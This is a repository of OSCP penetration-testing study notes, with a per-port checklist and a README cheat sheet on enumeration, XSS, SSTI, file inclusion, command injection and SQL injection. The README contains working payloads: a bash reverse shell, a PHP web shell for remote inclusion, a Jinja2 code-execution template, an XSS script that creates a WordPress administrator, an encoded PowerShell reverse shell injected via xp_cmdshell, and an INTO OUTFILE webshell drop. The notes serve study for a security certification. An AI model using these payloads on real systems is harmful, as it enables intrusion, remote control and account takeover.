├── CHECKLISTS.md
├── LICENSE
├── README.md
└── img
    ├── Web Information Gathering Mindmap.pdf
    ├── Web Information Gathering Mindmap.png
    ├── ad-map.png
    ├── kerberos.png
    ├── mindmap_ad_dark_classic_2025.03.excalidraw.svg
    └── ntlm.png


/CHECKLISTS.md:
--------------------------------------------------------------------------------
 1 | A list of important checks to perform in the OSCP certification (or in a real pentest) for each protocol. 
 2 | Check https://book.hacktricks.xyz to go deeper on the service pentesting.
 3 | 
 4 | # Privilege Escalation Checks
 5 | ## Linux PE Checks
 6 | 
 7 | - [g0tmi1k blog](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation)
 8 | - [HackTricks](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)
 9 | - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
10 | ## Windows PE Checks
11 | 
12 | - [HackTricks](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)
13 | - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
14 | - [ViperOne Pentest Everything](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/privilege-escalation/privilege-escalation-checklist)
15 | 
16 | ### Note 
17 | 
18 | After the first foothold, remember to enumerate internal networking. This can lead to private hosted Web servers, MSSQL servers or other. Using pivoiting (eg: chisel) can help to scan internal network from the Kali machine.
19 | 
20 | ## Active Directory
21 | 
22 | - [Chance-Penalty-6734's useful checklist](https://drive.google.com/file/d/1sLxTSGQImCxE8KbPi063OuH461ADzCR3/view) source: [this](https://www.reddit.com/r/oscp/comments/14by0mv/my_active_directory_notes_passed_ad_in_6_hours) Reddit post
23 |   
24 | ![Chance-Penalty-6734's mindmap](img/ad-map.png)
25 |   
26 | # FTP port 21
27 | 
28 | - Enumerate the service with **nmap**, usually it is available on port 21 using `nmap --script ftp-* -p 21 <IP>`
29 | - Check if the FTP version is vulerable
30 | - Check if it is allowed anonymous login using `ftp anonymous@<IP>` and eventually read the files
31 | - As the last chance run a bruteforce attack `hydra -L path/to/usernames.txt -P path/to/wordlist.txt <IP> ftp`
32 | - If gained write access and ftp is linked to a webserver, try uploading a revserse shell
33 | 
34 | # SSH port 22
35 | 
36 | - Enumerate the service both on port 22 and 2222 where it is usually hosted
37 | - Try password spreading with found credentials
38 | - Once in the system check /etc/passwd for other users and then perform basic bruteforce (eg: username:username)
39 | - Check if there is also a **SFTP** share
40 | - If there is an **RSA** key protected by password, crack it with **ssh2john** and **john**
41 | - As the last chance run a bruteforce attack `hydra -L path/to/usernames.txt -P path/to/wordlist.txt <IP> ssh`
42 | 
43 | # WEB port 80, 443
44 | 
45 | - Enumerate the webservice with basic nmap script `nmap --script=http-enum <IP>`
46 | - Check /robots.txt and /sitemap.xml for additional information
47 | - Enumerate web directories with Feroxbuster, Dirbuster, Gobuster
48 | - Check for default credentials in the exposed service (eg: admin:admin)
49 | - If found an API endpoint, try to FUZZ it with Gobuster
50 | - Get the version of the webserver and search on searchsploit for known exploits
51 | - Enumerate with `whatweb` the service, find is a known exploitable CMS. (eg: umbraco)
52 | - Enumerate with `wpscan` in order to find if the webserver runs on **WordPress** and search for plugin vulnerabilities
53 | - If found a login page try SQL injection with some [cheatsheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
54 | - Perform a Path Traversal and LFI when a `?page=X` is found. In case of a Windows machine try a RFI with Pass the Hash attack
55 | - Check for links and file inclusions with a web spider, eg: [gospider](https://github.com/jaeles-project/gospider)
56 | - Check for SSL vuln and score with [testssl](https://github.com/drwetter/testssl.sh)
57 | - Also follow [hacktricks checklists](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web)
58 |   
59 | # KERBEROS, 88
60 | 
61 | - Enumerate the domain with nmap
62 | - Perform a [Kerbrute attrack](https://www.hackingarticles.in/a-detailed-guide-on-kerbrute)
63 | - With known credentials if the Kerberos pre-authentication is not enabled (**DONT_REQ_PREAUTH**), perform a [AS-Rep roast attack](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast)
64 | - Once in the system perform analysis on [Kerberoastable](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast) users and eventually perform Kerberoasting
65 | - If found any hashes with `responder` or other methods, crack them with `hashcat` or perform Relay Attack
66 | 
67 | # SNMP port 161
68 | 
69 | - Enumerate the version of the service. It runs on SNMP and requires sudo to scan `sudo nmap -p 161 -sV <IP>`
70 | - Try `snmpwalk` on the service and get all info about MIBs, check known MIBs (users, installed programs etc..)
71 | - Try to get more information enumerating `NET-SNMP-EXTEND-MIB::nsExtendOutputFull`
72 | 
73 | # SMB 139, 445
74 | 
75 | - Enumerate SMB version, check if signing is enabled, in order to perform Relay Attacks
76 | - Check if SMB anonymous share access is enabled. If so download all possible data. Perform data analysis
77 | - Spray found credentials in the domain (or not, with **--local-auth**) with `crackmapexec`, repeat the process for every username and password found
78 | - If there are **writable folders**, try to perform `PsExec` authentication with `impacket-psexec`
79 | - Check interesting folders on the Domain Controllers public shares
80 | - If gained write access and SMB is linked to a webserver, try uploading a revserse shell
81 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 Patrick Di Fazio
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
   1 | # OSCP
   2 | Notes and study guide for the OSCP certification.
   3 | 
   4 | ## Star History
   5 | 
   6 | [![Star History Chart](https://api.star-history.com/svg?repos=BlessedRebuS/OSCP-Pentesting-Cheatsheet&type=Date)](https://star-history.com/#BlessedRebuS/OSCP-Pentesting-Cheatsheet&Date)
   7 | 
   8 | # Enumeration
   9 | ## NMAP
  10 | Generates high amount of traffic in the scanned machine, so we must know this can be recognized by traffic analyzers or packet scanners. The more ports are open, the more traffic is generated. A scan of all 65535 ports will generate about 4MBs of traffic. A full TCP/UDP scan on all the ports for 254 hosts (eg: 192.168.1.0/24) can reach over 1GB of traffic over the time for the scanned machine. That for sure can be detected.
  11 | 
  12 | ### TCP SYN Scan
  13 | ```bash
  14 | nmap -Ss <target>
  15 | ```
  16 | Send **SYN** request to a machine, whitout handshake. In this way a **SYN-ACK** is sent back to the sender and we know the port is open. The requester at the end does not send the final ACK, resulting in less noise in the network. In this way less traffic and less steps are done in the scan process.
  17 | 
  18 | ### TCP Connect Scan
  19 | ```bash
  20 | nmap <target>
  21 | ```
  22 | Performs a full TCP connection. This is the default method of NMAP. It takes longer because the handshake is completed.
  23 | 
  24 | ### UDP Scan
  25 | ```bash
  26 | nmap -sU <target>
  27 | ```
  28 | Apart from port-specific protocols, like **SMTP** or others, it sends an **ICMP** (ICMP port unreachable method) packet to the receiver port and wait for response. Here (but not only here) **sudo** is required because the system access the raw socket in order to implement the IPv4 protocol in user space. This is because sending and receiving raw packets requires root access on a Unix or Mac system. On Windows, you will have to use an administrator account.
  29 | 
  30 | ### Network Sweeping
  31 | ```bash
  32 | nmap -sn <target-range>
  33 | ```
  34 | The discovery sends the UDP requests, but also a TCP SYN packet to port 443 and a TCP ACK packet to port 80 and ICMP requests for the traditional [ping sweep](https://it.wikipedia.org/wiki/Ping_sweep). This is done for each host. For a specific sweep, it could be used a more effective scan with:
  35 | ```
  36 | nmap -p <PORT> <target>
  37 | ```
  38 | 
  39 | ### Most common ports
  40 | ```bash
  41 | nmap -sT <target>
  42 | ```
  43 | 
  44 | ### Traceroute
  45 | ```bash
  46 | nmap -A <target>
  47 | ```
  48 | 
  49 | ### OS Fingerprint
  50 | ```bash
  51 | nmap -O <target>
  52 | ```
  53 | Try to guess the operating system behind the server, based on how the server is responding. This is effective because the TCP/IP stack is implemeted differently in the Operating Systems. The result fingreprint is then matched with a list of fingerprint of many OS. Adding **--osscan-guess** we get a guess of the OS.
  54 | 
  55 | ### Server Banners
  56 | ```bash
  57 | nmap -sV <target>
  58 | ```
  59 | In order to have a better understanding of the service we can try to read the server fingerprint for that port. This increase the traffic for the scan.
  60 | 
  61 | ### [NMAP Scripting Engine](https://nmap.org/book/nse.html)
  62 | ```bash
  63 | nmap -sV -sC --script=banner -p 80,443 <target>
  64 | ```
  65 | With the directive --script we can specify the script we want. With the -sC the "default" scripts are used. In this case we only want HTTP/HTTPS banners, so we scan only the 80 and 443 ports.
  66 | 
  67 | Integrates user created script for automated scanning. To read more about the script we are using we can run
  68 | ```bash
  69 | nmap --script-help <SCRIPT-NAME>
  70 | ```
  71 | The list of script can be found at **/usr/share/nmap/scripts**.
  72 | To use a custom NMAP script (.nes script) we must download it first from Github and move it in the NMAP script folder. After we run `sudo nmap --script-updatedb` and we will use the script with 
  73 | ```bash
  74 | nmap -sV --script "cve-script-name" <target>
  75 | ```
  76 | 
  77 | ### LOLBin approach for NMAP on Windows
  78 | ```powershell
  79 | Test-NetConnection -Port <PORT> <HOST>
  80 | ```
  81 | With some **powershell** scripting, the util **Test-NetConnection** can be used as a **NMAP** scan both for TCP and UDP.
  82 | ```powershell
  83 | 1..10000 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("target-ip", $_)) "TCP port $_ is open"} 2>$null
  84 | ```
  85 | 
  86 | ## SMB 
  87 | Server Message Block is a protocol used in Microsoft systems to exhange file or messages.
  88 | It has been attacked over the years and this led to an implementation to a better software: **Netbios**. Netbios is a session layer protocol that lets computers in the same network communicate and listens on port TCP 139. SMB is on port TCP 445. NBT (Netbios over TCP is often required to run among SMB for compatibility). There are many useful tools to scan Netbios, like **NMAP** or **nbtscan**. The following scenario uses `-r` that indicates nbtscan to use port UDP 137, the Netbios Name service port.
  89 | ```bash
  90 | sudo nbtscan -r <target-range>
  91 | ```
  92 | To scan for SMB shares it can be used the tool `enum4linux` and then the connection can be tested with
  93 | ```bash
  94 | smbclient -L //<IP>
  95 | ```
  96 | With -L for share listing and then
  97 | ```bash
  98 | smbclient //<IP> -U <USER>
  99 | ```
 100 | To connect to a specific share (in this case without password protection)
 101 | 
 102 | NMAP offers too many scripts for enumeration or information gathering on Windows Host with Netbios enabled (eg: `--script smb-os-discovery`).
 103 | From Windows the smb connections can be tested with
 104 | ```powershell
 105 | net view \\<host> /all
 106 | ```
 107 | With `/all` we can list Administrators shares ending with `$`
 108 | 
 109 | SMB can be exploited if the `signing is disabled`, with a [NTLM Relay attack](https://hackdefense.com/publications/het-belang-van-smb-signing/) we will cover in the next sections. Systems are susceptible to an NTLM relay attack because the recipient does not verify the content and origin of the message.
 110 | 
 111 | ## SMTP
 112 | Simple Mail Transfer Protocol is a standard protocol for mail transmission. It can be enumerated on port 25 with netcat.
 113 | We can ask for known users or bruteforce the server for gaining information.
 114 | ```bash
 115 | nc -nv <target> 25
 116 | > VRFY username
 117 | ...
 118 | > EXPN username
 119 | ```
 120 | With `VRFY` (verify) we ask to the server if the username is present and with `EXPN` (expand) if which mailing lists the user is subscribed to.
 121 | On a Windows system we can use
 122 | ```powershell
 123 | Test-NetConnection -Port 25 <target>
 124 | ```
 125 | Or `telnet`.
 126 | 
 127 | ### SWAKS
 128 | Swaks is a good tool for interacting with SMTP servers. It offers also an easy way to attach files. This is a good alternative to netcat for email sending.
 129 | ```bash
 130 | swaks --to receiver@mail.com --from sender@mail.com --auth LOGIN --auth-user sender@mail.com --header-X-Test "Header" --server <TARGET-IP> --attach file.txt
 131 | ```
 132 | 
 133 | ## SNMP
 134 | Simple Network Management Protocol or SNMP is a UDP based protocol, implemented at the beginning in not a very safe way. It has a database (MIB) with information related to network. The default SNMP port is 161 UDP. Until the third version of this protocol, SNMPv3 this protocol was poorly secured.
 135 | There are many tools to use here because SNMP can tell us many things about an organization, based on the response of the server. We can use `onesixtyone` for basic bruteforce and enumeration and `snmpwalk` to access data in MIB database.
 136 | The “SNMP community string” is like a user ID or password that allows access to a router's or other device's statistics.
 137 | SNMP community strings are used only by devices which support the SNMPv1 and SNMPv2c protocol. SNMPv3 uses username/password authentication, along with an encryption key.
 138 | By convention, most SNMPv1-v2c equipment ships from the factory with a read-only community string set to “public”. It is standard practice for network managers to change all the community strings to customized values in the device setup.
 139 | 
 140 | ```bash
 141 | snmpwalk -c public -v1 -t 5 <target>
 142 | ```
 143 | In this way we enumerate all the MIB tree of a SNMPv1 version with a timeout of 5 seconds, on the target IP.
 144 | ```
 145 | # MIB Value        Microsoft Windows SNMP parameters
 146 | 1.3.6.1.2.1.25.1.6.0         System Processes
 147 | 1.3.6.1.2.1.25.4.2.1.2         Running Programs
 148 | 1.3.6.1.2.1.25.4.2.1.4         Processes Path
 149 | 1.3.6.1.2.1.25.2.3.1.4         Storage Units
 150 | 1.3.6.1.2.1.25.6.3.1.2         Software Name
 151 | 1.3.6.1.4.1.77.1.2.25         User Accounts
 152 | 1.3.6.1.2.1.6.13.1.3         TCP Local Ports
 153 | ```
 154 | 
 155 | To search deeaper use the extend functionality of SNMP. As suggested in [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp/snmp-rce)
 156 | 
 157 | ```bash
 158 | apt-get install snmp-mibs-downloader
 159 | snmpwalk -v2c -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
 160 | ```
 161 | 
 162 | # Web Application Pentesting
 163 | A useful MindMap to follow as guideline for a Web Pentesting is the following,  (credit to [ethanlacerenza](https://github.com/ethanlacerenza?tab=repositories))
 164 | 
 165 | <p align="center">
 166 |   <img src="img/Web Information Gathering Mindmap.png" />
 167 | </p>
 168 | 
 169 | Web application penetration testing is the practice of simulating attacks on a system in an attempt to gain access to sensitive data, with the purpose of determining whether a system is secure. These attacks are performed either internally or externally on a system, and they help provide information about the target system, identify vulnerabilities within them, and uncover exploits that could actually compromise the system. It is an essential health check of a system that informs testers whether remediation and security measures are needed. <!-- https://www.synopsys.com/glossary/what-is-web-application-penetration-testing.html --> 
 170 | 
 171 | With NMAP we can get the **fingerprint** of a webserver.
 172 | ```bash
 173 | sudo nmap -p 443,80 --script=http-enum <target>
 174 | ```
 175 | And can discover most popuar directories open on the server.
 176 | 
 177 | ## Wordpress enumeration
 178 | We can enumerate WordPress pages and their plugins and themes with [wpscan](https://github.com/wpscanteam/wpscan). The following bash line will instruct wpscan to enumerate plugins in aggressive mode and print the output on a file
 179 | 
 180 | ```bash
 181 | wpscan --url https://<TARGET> --enumerate p --plugins-detection aggressive -o dir/file.txt
 182 | ```
 183 | 
 184 | ## Web Technology
 185 | To perform a web tecnology enumeration, and to know for example which service the web server is running, we can use [WhatWeb](https://github.com/urbanadventurer/WhatWeb)
 186 | 
 187 | ```bash
 188 | whatweb <URL>
 189 | ```
 190 | 
 191 | ## Gobuster
 192 | This is a tool that can discover hidden path in webservers. It uses wordlist to bruteforce directories, files or can perform a **Fuzzing** / **DNS** enumeration.
 193 | ```bash
 194 | gobuster dir -u <target> -w /path/to/wordlist -t 10
 195 | ```
 196 | In this case Gobuster is run with 10 threads with a directory bruteforce attack on the given target. Gobuster can also bruteforce APIs path
 197 | ```bash
 198 | gobuster dir -u <target> -w /path/to/wordlist -p /path/to/api-pattern
 199 | ```
 200 | Where the file `/path/to/api-pattern` is something like that
 201 | ```txt
 202 | {GOBUSTER}/v1
 203 | {GOBUSTER}v2
 204 | ```
 205 | Many times custom or not-standard APIs are the most vulnerable. Exploiting a login API, for example, we could log in into a web server with admin privileges.
 206 | 
 207 | With `-x` we can specify file extensions
 208 | 
 209 | ```bash
 210 | gobuster dir -u <target> -w /path/to/wordlist -x php js aspx md txt jpg png
 211 | ```
 212 | 
 213 | ## Burp Suite
 214 | Is platform for Web App testing. It can works as a proxy, repeater, intruder, we can use it even for bruteforces attacks and many other things. We use it as proxy that intercepts requests, analyzes it and send them back to the server. The community edition can be used for free.
 215 | https://portswigger.net/burp. Burp Suite can be configured as a proxy and intercept traffic sent by a Firefox or Chrome browser. Requests can be viewed, modified, dropped etc...
 216 | 
 217 | # XSS
 218 | Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
 219 | 
 220 | An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. <!-- https://owasp.org/www-community/attacks/xss/ -->
 221 | XSS are divided in two types: **stored** that remains persistent on the webserver and **reflected** that are usually crafted to be inserted in a link and run-time executed .
 222 | The most common string to test an XSS vulnerability is
 223 | ```javascript
 224 | <script>alert(1)</script>
 225 | ```
 226 | In a case when our payload is stored actively on the server, for example if we inject an XSS inside the User Agent, the web administrator of the page could see the XSS (the popup) in his administration page (eg. Wordpress Panel). If the XSS is for example a redirect or some dangerous arbitrary code, many bad things can be done.
 227 | 
 228 | ## Cookies
 229 | HTTP cookies, or internet cookies, are built specifically for web browsers to track, personalize and save information about each user’s session. A “session” is the word used to define the amount of time you spend on a site. Cookies are created to identify you when you visit a new website. The web server — which stores the website’s data — sends a short stream of identifying information to your web browser in the form of cookies. This identifying data (known sometimes as “browser cookies”) is processed and read by “name-value” pairs. These pairs tell the cookies where to be sent and what data to recall.  <!-- https://www.kaspersky.com/resource-center/definitions/cookies -->
 230 | Cookies can be found under **Storage** tab in the Browser inspect settings. Sessions cookies with **secure** flag can be sent only over HTTPS. The HttpOnly tells the browser to deny JavaScript access to cookies.
 231 | 
 232 | ## Wordpress Nonce
 233 | WordPress nonces protect the platform against various malicious attacks, particularly cross-site request forgery (CSRF). This cyber attack exploits WordPress security vulnerabilities to trick users into submitting unwanted requests, from changing users’ login details to deleting user accounts. In the following way we can get a Nonce for a dinamically created user.
 234 | ```javascript
 235 | var ajaxRequest = new XMLHttpRequest();
 236 | var requestURL = "/wp-admin/user-new.php";
 237 | var nonceRegex = /ser" value="([^"]*?)"/g;
 238 | ajaxRequest.open("GET", requestURL, false);
 239 | ajaxRequest.send();
 240 | var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
 241 | var nonce = nonceMatch[1];
 242 | ```
 243 | 
 244 | And we can create the new user with
 245 | 
 246 | ```javascript
 247 | var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&email=attacker@offsec.com&pass1=attackerpass&pass2=attackerpass&role=administrator";
 248 | ajaxRequest = new XMLHttpRequest();
 249 | ajaxRequest.open("POST", requestURL, true);
 250 | ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 251 | ajaxRequest.send(params);
 252 | ```
 253 | 
 254 | We can then minify the attack with something like [JSCompress](https://jscompress.com/) and encode it in UTF-16 integer with [Cyberchef](https://gchq.github.io/CyberChef/) or charCodeAt JS function.
 255 | At this point we only need to find a way to inject it in the Server in a persistent way (XSS Stored). This can be done if the PHP part of the server doesn't sanitize input in the User-Agent or other parameters of the requerst headers. Once we got the admin access we can craft or use a WebShell plugin to enumerate and exploit the system. We can use something like https://github.com/p0dalirius/Wordpress-webshell-plugin.
 256 | 
 257 | ## SSTI: Server Side Template Injection
 258 | Attackers use the server-side template injection technique to directly insert user input into templates, allowing them to introduce arbitrary directives that alter the template engine’s behavior. It can allow threat actors to gain full control of a targeted server. An common example of SSTI is **Flask/Jinja2** SSTI. A good cheatsheet for this type of vulnerability is [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md?ref=sec.stealthcopter.com). A Jinja2 SSTI that enables RCE on the server payload is the following. To gain a reverse shell, consider to base64 encode and then decode the command.
 259 | 
 260 | ```python
 261 | {{ cycler.__init__.__globals__.os.popen('<CMD>').read() }}
 262 | ```
 263 | 
 264 | #  Path Traversal and Local File Inclusion
 265 | A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). <!-- https://owasp.org/www-community/attacks/Path_Traversal -->
 266 | Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others. <!-- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion -->
 267 | 
 268 | Exploiting a Path Traversal and a LFI in a server, could led us to open shell using a **simple reverse shell bash oneliner**, if we poison some part of the system, for example the Apache Logs in a Linux system, eg: [Apache Log Poisoning through LFI](https://www.hackingarticles.in/apache-log-poisoning-through-lfi/).
 269 | ```bash
 270 | bash -i >& /dev/tcp/<IP>/4000 0>&1
 271 | ```
 272 | 
 273 | # Remote File Inclusion
 274 | Remote File Inclusion or RFI is done the same way of LFI, but we have to be the source of the malicious script. In the case of a PHP webserver, It could be
 275 | ```php
 276 | <?php
 277 | if(isset($_REQUEST['cmd'])){
 278 |         echo "<pre>";
 279 |         $cmd = ($_REQUEST['cmd']);
 280 |         system($cmd);
 281 |         echo "</pre>";
 282 |         die;
 283 | }
 284 | ?>
 285 | ```
 286 | And we can call the script with an inclusion of it, eg: `http://webserver.com/index.php?page=http://<attacker-ip>/malicious-file.php` . On the attacker side we have first to launch a webserver with the malicious file with
 287 | 
 288 | ```bash
 289 | python3 -m http.server 80
 290 | ```
 291 | 
 292 | # File Uploads
 293 | For more examples, visit https://pentestmonkey.net/tools/web-shells/php-reverse-shell.
 294 | Going on, with File Upload vulnerabilities we can do a lot of things. A part from uploading a reverse-shell.php, we can also upload in specific places of the filesystem, dangerous file that could replace original ones. For example, replacing the /etc/passwd and the /etc/shadow file in a system, we could gain permission to log in with a "pre crafted" user.
 295 | This can be done exploiting a File Upload with something like `../../../../../../../../etc/passwd` and `../../../../../../../../etc/shadow` if the server doesn't sanitize file names.
 296 | 
 297 | # Command Injection
 298 | Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
 299 | 
 300 | This attack differs from Code Injection, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code. <!-- https://owasp.org/www-community/attacks/Command_Injection -->
 301 | For example if a web server executes a command on the operating system below and doesn't sanitize the input, could let the attacker craft a payload with some special characters like `;` or `&&` that are used to concatenate commands in a sytem. A pratical example could be a server that arguments for a known command, eg: ls
 302 | ```bash
 303 | http://<target-url>/pages/command=cmd=ls;id
 304 | ```
 305 | In that case the webserver executes `ls` among with the `id` command.
 306 | 
 307 | # SQL Vulerabilities
 308 | ## SQL Injection
 309 | SQL Injections are the most common form of injections because SQL databases are very popular in dynamic web applications. This vulnerability allows an attacker to tamper existing SQL queries performed by the web application. Depending on the queries, the attacker might be able to access, modify or even destroy data from the database.
 310 | Since databases are commonly used to store private data, such as authentication information, personal user data and site content, if an attacker gains access to it, the consequences are typically very severe, ranging from defacement of the web application to users data leakage or loss, or even full control of the web application or database server. <!-- https://probely.com/vulnerabilities/sql-injection -->
 311 | 
 312 | ## SQL Union Based Attacks
 313 | When an application is vulnerable to SQL injection, and the results of the query are returned within the application's responses, you can use the UNION keyword to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack. <!-- https://portswigger.net/web-security/sql-injection/union-attacks -->
 314 | 
 315 | ## Blind SQL Injection
 316 | Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
 317 | When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible. <!-- https://owasp.org/www-community/attacks/Blind_SQL_Injection -->
 318 | 
 319 | This is a SQL Injection cheat sheet for testing https://github.com/payloadbox/sql-injection-payload-list.
 320 | 
 321 | ## MSSQL Code Execution
 322 | In MSSQL thanks to the keyword execute, we can execute arbitrary command on the operating system below. To do that first we have to enable command execution inside the Database with
 323 | 
 324 | ```sql
 325 | EXECUTE sp_configure 'show advanced options', 1;
 326 | RECONFIGURE;
 327 | EXECUTE sp_configure 'xp_cmdshell', 1;
 328 | RECONFIGURE;
 329 | ```
 330 | 
 331 | Then execute commands with
 332 | 
 333 | ```sql
 334 | EXECUTE xp_cmdshell 'whoami'
 335 | ```
 336 | Putting all togheter, we can have very fancy injections adding multiple tools.
 337 | 
 338 | ### impacket-mssqlclient
 339 | We can use **impacket-mssqlclient** with **-windows-auth** as login method in the **MSSQL** Database
 340 | 
 341 | ```bash
 342 | proxychains python3 /home/kali/.local/bin/mssqlclient.py -port 1433 domain.com/user:password@<IP> -windows-auth
 343 | ```
 344 | 
 345 | ## Blind Reverse Shell - SQL Injection 
 346 | The following payload has been crafted with https://www.revshells.com/
 347 | ```sql
 348 | '; EXECUTE xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='; --
 349 | ```
 350 | 
 351 | ## Uploading a PHP Backdoor from SQL
 352 | In other database scenarios we can abuse the `SELECT INTO_OUTFILE` statement and we can try to upload something malicious in the webserver. We must have write permission in the folder we will write the file into.
 353 | ```sql
 354 | ' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
 355 | ```
